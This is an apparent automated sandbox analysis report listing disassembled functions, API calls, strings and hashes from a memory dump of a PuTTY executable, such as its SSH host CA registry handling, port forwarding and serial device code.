                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: QueryValue_strlen$CloseCreate_strcat
                    • String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
                    • API String ID: 1841596437-2091482613
                    • Opcode ID: 2756ca9cff163d0e5ee9eb4d59a4c215652df88d7f057cc0670c0c543fc3133b
                    • Instruction ID: 8039ba8ec69e95d75730496af942a4a83c05454783f3ab7c1306e8a5f370e17c
                    • Opcode Fuzzy Hash: 2756ca9cff163d0e5ee9eb4d59a4c215652df88d7f057cc0670c0c543fc3133b
                    • Instruction Fuzzy Hash: 3541B4E5D003806BDA106B31AC83F3B76D89F51745F084478FC4996243F775D954E6A3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE4210 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 100COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BEB9B0: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00BEBA26
                      • Part of subcall function 00BEB9B0: RegCloseKey.ADVAPI32(?), ref: 00BEBA6A
                      • Part of subcall function 00BEBCB0: _strlen.LIBCMT ref: 00BEBCC0
                      • Part of subcall function 00BEBCB0: RegSetValueExA.ADVAPI32(00BE3FEC,?,00000000,00000001,00000000,-00000001,?,?,?,?,?,?,?,?,?,?), ref: 00BEBCD3
                    • _strlen.LIBCMT ref: 00BE4291
                      • Part of subcall function 00C16DE0: ___from_strstr_to_strchr.LIBCMT ref: 00C16E35
                      • Part of subcall function 00BEBBB0: RegSetValueExA.ADVAPI32(00000000,00BE42D0,00000000,00000004,00000000,00000004,?,00000000,00BE42D0,00000000,PermitRSASHA1,?), ref: 00BEBBD2
                      • Part of subcall function 00BEBA90: RegCloseKey.ADVAPI32(00000000,00BE448C,00000000), ref: 00BEBA94
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CloseValue_strlen$Create___from_strstr_to_strchr
                    • String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
                    • API String ID: 1175142446-1463427279
                    • Opcode ID: 91595f4a4e1f312cb708a9412439d17f4ef89c544498a5ff825660ba3c68449f
                    • Instruction ID: be2a03917a3cf2a7c8090687f42266fc98843795c993a42105e8fa143df1570a
                    • Opcode Fuzzy Hash: 91595f4a4e1f312cb708a9412439d17f4ef89c544498a5ff825660ba3c68449f
                    • Instruction Fuzzy Hash: 982196EAD001907FEB113A616C87E7B36948F52745F1800B1FD089A253F7418925A7A7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C14B10 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 63COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strrchr
                    • String ID: %.*s $%.*s %d $%02x%s$%s (with certificate: %s)$/home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/sshpubk.c$SHA256:$false && "ssh_fptype_from_cert ruled out the other values"
                    • API String ID: 3213747228-2804460150
                    • Opcode ID: 5e6b70962496dc37473eb71fdafbd894c424eb564b777550ca6fbadf273cd17d
                    • Instruction ID: 1326e6e8f10d098c3a62fef99bb20bb6367c1964fd51872a94c69c7ae37f109e
                    • Opcode Fuzzy Hash: 5e6b70962496dc37473eb71fdafbd894c424eb564b777550ca6fbadf273cd17d
                    • Instruction Fuzzy Hash: B00188F6A003592FEA106A217C8BD6B769DDEC1759F050434FC09C7102F622DE1DD5B2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD8C40 Relevance: 15.1, APIs: 10, Instructions: 92threadtimeclipboardCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32 ref: 00BD8C52
                    • GetCapture.USER32 ref: 00BD8C6D
                    • GetClipboardOwner.USER32 ref: 00BD8C84
                    • GetQueueStatus.USER32(00001CBF), ref: 00BD8CA0
                    • GetCursorPos.USER32(?), ref: 00BD8CC0
                    • GlobalMemoryStatus.KERNEL32 ref: 00BD8CD6
                    • GetCurrentThread.KERNEL32 ref: 00BD8CF5
                    • GetThreadTimes.KERNEL32(00000000,?,?,?,?), ref: 00BD8D04
                    • GetCurrentProcess.KERNEL32 ref: 00BD8D17
                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?), ref: 00BD8D22
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CurrentProcessStatusThreadTimes$CaptureClipboardCursorForegroundGlobalMemoryOwnerQueueWindow
                    • String ID:
                    • API String ID: 3596705544-0
                    • Opcode ID: b160fad8173ef79ad077972ba9f88c16e17bc4f5e33cd09991837fbe2d7b1e04
                    • Instruction ID: 093fcf7485180577ef9e684dce68fb297408a07e5edf189ea37bea320175a481
                    • Opcode Fuzzy Hash: b160fad8173ef79ad077972ba9f88c16e17bc4f5e33cd09991837fbe2d7b1e04
                    • Instruction Fuzzy Hash: 0B2182B29413107BD6106BA1AC0AF9F7FA8EF4A75EF040419F64A972C1EA715504CBE7
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BF6A00 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 312COMMON
                    Download Yara Rule
                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BF6C1E
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ___from_strstr_to_strchr
                    • String ID: %s$%s%s$A46$LRD$Specified forwarding already exists$You need to specify a destination addressin the form "host.name:port"$You need to specify a source port number
                    • API String ID: 601868998-44983218
                    • Opcode ID: 97226edceb0b56e313cd4806961f0b51e0a405534159776a89353d53616a179e
                    • Instruction ID: f341ce94d27beab4c304984e1dcc89f11484bf556c06b3728db0e7d95e95b278
                    • Opcode Fuzzy Hash: 97226edceb0b56e313cd4806961f0b51e0a405534159776a89353d53616a179e
                    • Instruction Fuzzy Hash: 8791E3B5A043447BDB116721AC47E3B77E9DF91748F0808B9FD8997353FA22AD188263
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD2A30 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 95COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemText
                    • String ID: /home/simon/mem/.build/workdirs/bob-jmc5owxa/putty/windows/controls.c$Font: %s, %s%d-%s$Font: %s, %sdefault height$bold, $c && c->ctrl->type == CTRL_FONTSELECT$pixel$point
                    • API String ID: 3367045223-1561147066
                    • Opcode ID: 3193ec4fd352bd4988fc13539cbaaf1c4e9a9b9aed91f1c12313fafe85b64322
                    • Instruction ID: c156416699634503ef18a62df37a4ab6e752268b07b8ab5be0b35e7e7a58189b
                    • Opcode Fuzzy Hash: 3193ec4fd352bd4988fc13539cbaaf1c4e9a9b9aed91f1c12313fafe85b64322
                    • Instruction Fuzzy Hash: 9721E7B2A00145AFDB10AF54AC46E2BB7D5EB95708F0500B9F80997312F631ED18D762
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C72C97 Relevance: 13.8, APIs: 9, Instructions: 273COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00C73082: CreateFileW.KERNEL32(00000000,00000000,?,00C72D40,?,?,00000000,?,00C72D40,00000000,0000000C), ref: 00C7309F
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BD4CA5), ref: 00C72DAB
                    • __dosmaperr.LIBCMT ref: 00C72DB2
                    • GetFileType.KERNEL32(00000000), ref: 00C72DBE
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00BD4CA5), ref: 00C72DC8
                    • __dosmaperr.LIBCMT ref: 00C72DD1
                    • CloseHandle.KERNEL32(00000000), ref: 00C72DF1
                    • CloseHandle.KERNEL32(00C6C004), ref: 00C72F3E
                    • GetLastError.KERNEL32 ref: 00C72F70
                    • __dosmaperr.LIBCMT ref: 00C72F77
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID:
                    • API String ID: 4237864984-0
                    • Opcode ID: b8cca802a9a8d194db806a359067aab5be4659a2ee20c7ca17995221adfda20d
                    • Instruction ID: ed80946203c6721d6fbf75b085e57e43f120fd961ba53ec8027c72cacb049864
                    • Opcode Fuzzy Hash: b8cca802a9a8d194db806a359067aab5be4659a2ee20c7ca17995221adfda20d
                    • Instruction Fuzzy Hash: EAA13432A101549FCF299F78DC92BAE7BB1AB06320F14814DF816EF391DB358A46DB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BEC330 Relevance: 13.6, APIs: 9, Instructions: 112memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC367
                    • OpenProcess.KERNEL32(02000000,00000000,00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC375
                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3B4
                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3D1
                    • GetLengthSid.ADVAPI32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC3FB
                    • CopySid.ADVAPI32(00000000,00000000,00000000), ref: 00BEC41A
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC43B
                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC44A
                    • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,751F5B70,00BEC777), ref: 00BEC455
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: CloseHandleLocalProcess$AllocCopyCurrentErrorFreeLastLengthOpen
                    • String ID:
                    • API String ID: 621491157-0
                    • Opcode ID: be7b6469d37c98617861482998429b3e9609533306032f80109202ab24eaf441
                    • Instruction ID: 168bdd4a540418d693c13e5648d763efb340f6a911bd5335af013eba85c88c20
                    • Opcode Fuzzy Hash: be7b6469d37c98617861482998429b3e9609533306032f80109202ab24eaf441
                    • Instruction Fuzzy Hash: 7831CD71204350AFE7206FA6DC89B3F7FE8EB40B45F008168F906D62E1DB719801D7A2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD80E0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 302COMMON
                    Download Yara Rule
                    APIs
                    • _strlen.LIBCMT ref: 00BD8652
                      • Part of subcall function 00BD3040: SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00BD30C4
                      • Part of subcall function 00BD30F0: SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00BD3177
                    Strings
                    • Cannot decode key: %s, xrefs: 00BD872B
                    • Unable to load host CA record '%s', xrefs: 00BD85FC
                    • Invalid key (no key type), xrefs: 00BD8715
                    • CA key may not be a certificate (type is '%.*s'), xrefs: 00BD870B
                    • Invalid '%.*s' key data, xrefs: 00BD879B
                    • Unrecognised key type '%.*s', xrefs: 00BD8745
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: ItemMessageSend$_strlen
                    • String ID: CA key may not be a certificate (type is '%.*s')$Cannot decode key: %s$Invalid '%.*s' key data$Invalid key (no key type)$Unable to load host CA record '%s'$Unrecognised key type '%.*s'
                    • API String ID: 706372605-3650709019
                    • Opcode ID: de49a28b6c93558fc095c8fc165d3bf17c0fb767a374695eb492e5c7e523a771
                    • Instruction ID: 29a9462bf616ab52b902fb6c6d0878f0385aee3cb674dfe76e9961acd823abc5
                    • Opcode Fuzzy Hash: de49a28b6c93558fc095c8fc165d3bf17c0fb767a374695eb492e5c7e523a771
                    • Instruction Fuzzy Hash: 7A81EAF59002007BD6107B61BC46E67FADCEF5575AF180476F80D91303FA22E92896E3
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00C229A0 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 225COMMON
                    Download Yara Rule
                    APIs
                    • _strlen.LIBCMT ref: 00C22B6B
                    • _strlen.LIBCMT ref: 00C22BB0
                      • Part of subcall function 00C16E60: _strlen.LIBCMT ref: 00C16E6A
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: _strlen$_strcat
                    • String ID: *password*$Proxy password: $Proxy username: $Sending Telnet proxy command: $Telnet proxy authentication
                    • API String ID: 1497175149-2037000550
                    • Opcode ID: 187f2e08f21679dd1776d1cc4ae29fa5ba4c9901c58dc5c7a9a4624cbbc6fc78
                    • Instruction ID: c9b97aaa021e9350360a2bdf6e5bf411bf509d9a53db1a758b1420b9b4621954
                    • Opcode Fuzzy Hash: 187f2e08f21679dd1776d1cc4ae29fa5ba4c9901c58dc5c7a9a4624cbbc6fc78
                    • Instruction Fuzzy Hash: 5A8114B5900205BFDB10EF24EC46F6AB7A5FF44314F144568F8195B2A2E732EA24DB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BB8020 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                    Download Yara Rule
                    APIs
                    • IsZoomed.USER32 ref: 00BB8036
                    • GetDesktopWindow.USER32 ref: 00BB80FF
                    • GetClientRect.USER32(00000000), ref: 00BB8109
                    • IsZoomed.USER32 ref: 00BB81A2
                    • SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000116), ref: 00BB8203
                    • InvalidateRect.USER32(00000000,00000001), ref: 00BB8221
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: RectWindowZoomed$ClientDesktopInvalidate
                    • String ID: (
                    • API String ID: 2702938005-3887548279
                    • Opcode ID: 89962de35735b91de6de2e28b7554a2ee6c2a5d3f5cbd175ab8b0ea4a645cbd2
                    • Instruction ID: 607e29cfbe66ac347f1d43a90f6849b254cb1aa1748ba5725e8f57f64c1fd51f
                    • Opcode Fuzzy Hash: 89962de35735b91de6de2e28b7554a2ee6c2a5d3f5cbd175ab8b0ea4a645cbd2
                    • Instruction Fuzzy Hash: 0151C2706042019FDB15AF28EC56BAF3BE9EB44305F580968F946E72B1EFB1D840CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BDC050 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122fileCOMMON
                    Download Yara Rule
                    APIs
                    • ___from_strstr_to_strchr.LIBCMT ref: 00BDC0E2
                    • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 00BDC11D
                    • GetLastError.KERNEL32 ref: 00BDC190
                      • Part of subcall function 00BDC330: GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,00BDC140,?), ref: 00BDC34C
                      • Part of subcall function 00C15D30: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00C15D71
                      • Part of subcall function 00C15D30: InitializeCriticalSection.KERNEL32(00CB33E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 00C15DCA
                      • Part of subcall function 00C15D30: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 00C15DD8
                      • Part of subcall function 00C15D30: CreateThread.KERNEL32 ref: 00C15E02
                      • Part of subcall function 00C15D30: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 00C15E0D
                      • Part of subcall function 00C15A50: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15A91
                      • Part of subcall function 00C15A50: InitializeCriticalSection.KERNEL32(00CB33E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15ADA
                      • Part of subcall function 00C15A50: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15AE8
                      • Part of subcall function 00C15A50: CreateThread.KERNEL32 ref: 00C15B12
                      • Part of subcall function 00C15A50: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 00C15B1D
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState___from_strstr_to_strchr_strcat_strlen
                    • String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
                    • API String ID: 3096320600-1737485005
                    • Opcode ID: d6fc8c77c097cc7fa83bb33b29d1a6c72efc16f3bd1972a2feb6f18c8df6ad6d
                    • Instruction ID: 36ced7ab554e01f3eb0dbf400613100231320e545f87fdd6f1d0b0cde316f356
                    • Opcode Fuzzy Hash: d6fc8c77c097cc7fa83bb33b29d1a6c72efc16f3bd1972a2feb6f18c8df6ad6d
                    • Instruction Fuzzy Hash: 234191F5A00300AFE7106F21AC4AF277AE8EB55718F140569F9099B393F771E904CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BE7030 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 99networkCOMMON
                    Download Yara Rule
                    APIs
                    • getpeername.WS2_32(?,?), ref: 00BE7062
                    • htons.WS2_32(?), ref: 00BE70C5
                    • inet_ntoa.WS2_32(?), ref: 00BE70D6
                      • Part of subcall function 00BEE7A0: _strlen.LIBCMT ref: 00BEE7AB
                      • Part of subcall function 00BEE7A0: _strcat.LIBCMT ref: 00BEE7C7
                    • htons.WS2_32(?), ref: 00BE711F
                    • inet_ntop.WS2_32(00000017,?,?,00000041), ref: 00BE7135
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775584177.0000000000CB8000.00000002.00000001.01000000.00000007.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_bb0000_log.jbxd
                    Similarity
                    • API ID: htons$_strcat_strlengetpeernameinet_ntoainet_ntop
                    • String ID: %s:%d$[%s]:%d
                    • API String ID: 3000913097-2542140192
                    • Opcode ID: 0d67d03469cd1b1b6b386cf8b9606b404909e947a532380e879e6a9ea218c233
                    • Instruction ID: 96ee5611b8e471812720352beb97299f6d770ddbaf661094cc7d5fd536c88cb4
                    • Opcode Fuzzy Hash: 0d67d03469cd1b1b6b386cf8b9606b404909e947a532380e879e6a9ea218c233
                    • Instruction Fuzzy Hash: F1316FB15043409FE7209F65D845B6FBBF4EB88710F004A2DF99AC7291D775E944CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00BD8A50 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 77libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00BD8A8C
                    • GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 00BD8AA7
                    • GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 00BD8AC2
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.775057730.0000000000BB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00BB0000, based on PE: true
                    • Associated: 00000001.00000002.775047668.0000000000BB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775473068.0000000000C77000.00000002.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                    • Associated: 00000001.00000002.775552703.0000000000CB2000.00000004.00000001.01000000.00000007.sdmpDownload File
